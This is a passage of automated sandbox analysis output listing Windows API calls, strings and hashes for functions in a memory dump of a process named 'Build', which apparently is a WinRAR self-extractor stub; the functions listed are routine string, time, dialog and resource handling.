                                                                                                                                                                                • Instruction ID: 5895872ec64e7630e139f4173e11f8bff156f2a35f5b567a6b577d523dcc6446
                                                                                                                                                                                • Opcode Fuzzy Hash: 250785164882b3ccbd139a3e6d5637bfc8eb267d9153c496b24359c64ca9f102
                                                                                                                                                                                • Instruction Fuzzy Hash: 58F0C2317B1B239B0B35BFA64CCA96B22CCEA1235933888FAD559D3150EE58CC81D3D1
                                                                                                                                                                                APIs
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B54192
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B541A3
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B541B3
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B541C1
                                                                                                                                                                                • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00B4D2D3,?,?,00000000,?,?,?), ref: 00B541DC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcslen$CompareString
                                                                                                                                                                                • String ID: <
                                                                                                                                                                                • API String ID: 3397213944-4251816714
                                                                                                                                                                                • Opcode ID: 98129c741b2f26171c848e796230bdc2b40bb4475ace2eb006cf3190e65e7b34
                                                                                                                                                                                • Instruction ID: 9aefa6771a72ec320bb934654936f94c344167efc2407477d7d5846cea9eea1e
                                                                                                                                                                                • Opcode Fuzzy Hash: 98129c741b2f26171c848e796230bdc2b40bb4475ace2eb006cf3190e65e7b34
                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF03032048154BFCF121F52EC09ECE3F66EF50771B118095FA196A161CF72999597D0
                                                                                                                                                                                APIs
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00B535E6
                                                                                                                                                                                  • Part of subcall function 00B4D076: GetVersionExW.KERNEL32(?), ref: 00B4D0A7
                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B5360A
                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B53624
                                                                                                                                                                                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B53637
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B53647
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B53657
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2092733347-0
                                                                                                                                                                                • Opcode ID: 3d3545c2d617936d041c041ada0c6ad26491a8d19093a7438f6eaa1b9d102015
                                                                                                                                                                                • Instruction ID: 511f0f6cd2cd17b68f03021eb6b3c57b40d4b8d6995dbe94062c41e2adaea1cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 3d3545c2d617936d041c041ada0c6ad26491a8d19093a7438f6eaa1b9d102015
                                                                                                                                                                                • Instruction Fuzzy Hash: 3641367A1083059BCB04DFA8C88599BB7E8FF98704F44591EF989C7310EB30D949CBA6
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00B65111,00B64ECC,00B621B4), ref: 00B65128
                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B65136
                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B6514F
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00B65111,00B64ECC,00B621B4), ref: 00B651A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                • Opcode ID: b6fa9ca20353c94252ca725880826e0024d6a0d7531ed09b72114014f23a2be5
                                                                                                                                                                                • Instruction ID: 57fa10b4ca1bcdf5718696a9bfbbc11bc56dc7a2a4a28a18332281f36d9348f1
                                                                                                                                                                                • Opcode Fuzzy Hash: b6fa9ca20353c94252ca725880826e0024d6a0d7531ed09b72114014f23a2be5
                                                                                                                                                                                • Instruction Fuzzy Hash: 9401F736509B116EA73527B9BC867662BD8FB02374F6013A9F510A61F0EF694C60D244
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,00B850C4,00B66E12,00B850C4,?,?,00B6688D,?,?,00B850C4), ref: 00B6B9A9
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B9DC
                                                                                                                                                                                • _free.LIBCMT ref: 00B6BA04
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00B850C4), ref: 00B6BA11
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00B850C4), ref: 00B6BA1D
                                                                                                                                                                                • _abort.LIBCMT ref: 00B6BA23
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                                • Opcode ID: 0c4d15e8c49251e598e8423f1a66f2a7227120612ba2201dcb075ed6ec13b42d
                                                                                                                                                                                • Instruction ID: fb22ce404a9407bccf461f9e288a3581ef4c03afb1a090cb178839742f2fe67c
                                                                                                                                                                                • Opcode Fuzzy Hash: 0c4d15e8c49251e598e8423f1a66f2a7227120612ba2201dcb075ed6ec13b42d
                                                                                                                                                                                • Instruction Fuzzy Hash: ADF0C836604A0167C61673756C5AF6B26FEDFC1734F2401A4F619E32D2EF2D8C814151
                                                                                                                                                                                APIs
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B60059
                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B60073
                                                                                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B60084
                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00B6008E
                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00B60098
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B600A3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2148572870-0
                                                                                                                                                                                • Opcode ID: 421472ada18d2c572bcded4931b810162953ce8af31772fe817eb3c48b95cb64
                                                                                                                                                                                • Instruction ID: a60f3a51acdd5dd2940828143fe7373bbd9e192a2bdbb1fdeedb253a702ab5d7
                                                                                                                                                                                • Opcode Fuzzy Hash: 421472ada18d2c572bcded4931b810162953ce8af31772fe817eb3c48b95cb64
                                                                                                                                                                                • Instruction Fuzzy Hash: AEF0FF72A4522DBBCB306BA5DC4DEDF7F6DEF42751B008021F50AD2050EA78D585C7A0
                                                                                                                                                                                APIs
                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00B5D57B
                                                                                                                                                                                • GetDlgItemTextW.USER32(?,00000066,00001000,00000200), ref: 00B5D591
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000067,?), ref: 00B5D5B9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemText$Dialog
                                                                                                                                                                                • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                                                                                                                • API String ID: 1770891597-1315819833
                                                                                                                                                                                • Opcode ID: 565c09a60d7ad7effd1b96ed46733e797fb56ce03c7c04b80838594bb45f61b3
                                                                                                                                                                                • Instruction ID: f69767bc271a4151471046863bdb851f9fe340b943446fe770b0c5324b62fb67
                                                                                                                                                                                • Opcode Fuzzy Hash: 565c09a60d7ad7effd1b96ed46733e797fb56ce03c7c04b80838594bb45f61b3
                                                                                                                                                                                • Instruction Fuzzy Hash: 4E41B7719442086BEB30AF64DC45FFE77ECEB59301F1049B9FA05E3191DB70A9488B65
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B52663: _wcslen.LIBCMT ref: 00B52669
                                                                                                                                                                                  • Part of subcall function 00B4D848: _wcsrchr.LIBVCRUNTIME ref: 00B4D85F
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B4E105
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B4E14D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcslen$_wcsrchr
                                                                                                                                                                                • String ID: .exe$.rar$.sfx
                                                                                                                                                                                • API String ID: 3513545583-31770016
                                                                                                                                                                                • Opcode ID: b4702e792b9e9f8a330eaaa0d3ce62c2e5464b5594102eaf9d6a21894e279b54
                                                                                                                                                                                • Instruction ID: 990e60926bbc1dc7d4a6925be51d1201d1fa3863cb5faafd26aa5c1c6c0d9437
                                                                                                                                                                                • Opcode Fuzzy Hash: b4702e792b9e9f8a330eaaa0d3ce62c2e5464b5594102eaf9d6a21894e279b54
                                                                                                                                                                                • Instruction Fuzzy Hash: D241F22254071099D7326F348883A3B77F8FF42744B1049CEF9B5AB280E7A0DE85E351
                                                                                                                                                                                APIs
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B4DA59
                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00B4BD19,?,?,00000800,?,?,?,00B4BCD4), ref: 00B4DB02
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B4DB70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcslen$CurrentDirectory
                                                                                                                                                                                • String ID: UNC$\\?\
                                                                                                                                                                                • API String ID: 3341907918-253988292
                                                                                                                                                                                • Opcode ID: 5f2299ffd38af6977cf58ae4d42e15cf16253c11efe2e5828ab7ee42a9496982
                                                                                                                                                                                • Instruction ID: 8cbdcd8ccdd943518b25ddafba9cafc9f011b008700a311ba6c93a2367fa09c3
                                                                                                                                                                                • Opcode Fuzzy Hash: 5f2299ffd38af6977cf58ae4d42e15cf16253c11efe2e5828ab7ee42a9496982
                                                                                                                                                                                • Instruction Fuzzy Hash: 184196315043416AD621EF608D81EFF73FCEF56740F0548D9F994E3141E7A49E45E662
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadBitmapW.USER32(00000065), ref: 00B5D9ED
                                                                                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00B5DA12
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00B5DA44
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00B5DA67
                                                                                                                                                                                  • Part of subcall function 00B5C652: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C665
                                                                                                                                                                                  • Part of subcall function 00B5C652: SizeofResource.KERNEL32(00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C67C
                                                                                                                                                                                  • Part of subcall function 00B5C652: LoadResource.KERNEL32(00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C693
                                                                                                                                                                                  • Part of subcall function 00B5C652: LockResource.KERNEL32(00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C6A2
                                                                                                                                                                                  • Part of subcall function 00B5C652: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B5DA3D,00000066), ref: 00B5C6BD
                                                                                                                                                                                  • Part of subcall function 00B5C652: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00B5DA3D,00000066), ref: 00B5C6CE
                                                                                                                                                                                  • Part of subcall function 00B5C652: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B5C737
                                                                                                                                                                                  • Part of subcall function 00B5C652: GlobalUnlock.KERNEL32(00000000), ref: 00B5C756
                                                                                                                                                                                  • Part of subcall function 00B5C652: GlobalFree.KERNEL32(00000000), ref: 00B5C75D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                                                                                                                                • String ID: ]
                                                                                                                                                                                • API String ID: 1428510222-3352871620
                                                                                                                                                                                • Opcode ID: 29e175999b9d53765b828577dd8bd43ae09179d693ee4e184d61ceee03c90c8c
                                                                                                                                                                                • Instruction ID: 2e32df483dc8c0459a76db0ae322ba4f27f46f3bbd95695352ba5ee57dc00a09
                                                                                                                                                                                • Opcode Fuzzy Hash: 29e175999b9d53765b828577dd8bd43ae09179d693ee4e184d61ceee03c90c8c
                                                                                                                                                                                • Instruction Fuzzy Hash: B801C4325447016ADB2277649C0AB7F3EFADB82753F1401D0BD04A7291DF718D0D86A0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B41366: GetDlgItem.USER32(00000000,00003021), ref: 00B413AA
                                                                                                                                                                                  • Part of subcall function 00B41366: SetWindowTextW.USER32(00000000,00B765F4), ref: 00B413C0
                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00B5F99B
                                                                                                                                                                                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B5F9B1
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B5F9C5
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000068), ref: 00B5F9D4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemText$DialogWindow
                                                                                                                                                                                • String ID: RENAMEDLG
                                                                                                                                                                                • API String ID: 445417207-3299779563
                                                                                                                                                                                • Opcode ID: d503c3579032c556d1b562e98347f5c61ad9fa1cc63aa486300e7725f7bae866
                                                                                                                                                                                • Instruction ID: caba8063b8670805fcf0b275c1696fcd627f6d733259e5a1b57dbe70ffcee36c
                                                                                                                                                                                • Opcode Fuzzy Hash: d503c3579032c556d1b562e98347f5c61ad9fa1cc63aa486300e7725f7bae866
                                                                                                                                                                                • Instruction Fuzzy Hash: A501B5322887117AE2118B689D4AF77B7DDFB5AB13F2044A5F741A20D0CE62DA188B65
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B6A676,?,?,00B6A616,?,00B7F7B0,0000000C,00B6A76D,?,00000002), ref: 00B6A6E5
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B6A6F8
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00B6A676,?,?,00B6A616,?,00B7F7B0,0000000C,00B6A76D,?,00000002,00000000), ref: 00B6A71B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                • Opcode ID: 17aed8698bb6b6c43a54199d74e99627b023a2203e5d2d2ce07dadad7e48fcdc
                                                                                                                                                                                • Instruction ID: 5f62990076bb5f48f1da4eed22bcda4ec7fa89d323f47ab0477bfb2529594d67
                                                                                                                                                                                • Opcode Fuzzy Hash: 17aed8698bb6b6c43a54199d74e99627b023a2203e5d2d2ce07dadad7e48fcdc
                                                                                                                                                                                • Instruction Fuzzy Hash: F2F04F30A00608BBDF159FA5DC89BADBFF9EB08711F1441A9F909A3161CF355D80CB91
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
